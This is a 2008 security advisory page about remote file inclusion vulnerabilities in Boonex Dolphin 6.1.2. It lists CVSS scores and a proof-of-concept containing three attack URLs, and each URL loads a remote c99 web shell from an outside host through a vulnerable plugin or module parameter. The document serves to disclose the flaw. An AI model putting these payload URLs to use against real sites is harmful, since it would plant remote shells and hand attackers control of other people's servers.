Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

2008.07.16
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Name Of Script : Dolphin PHP # Version : 6.1.2 # Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip # Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ] # My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ] # Type Of Exploit : RFI In Multiple Files # Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below # POC : http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt? http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt? http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt? # Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path # Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD # Note : No One Perfect :) # rXh # bEST wISHES

References:

http://www.securityfocus.com/bid/30136
http://www.milw0rm.com/exploits/6024
http://secunia.com/advisories/30981


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top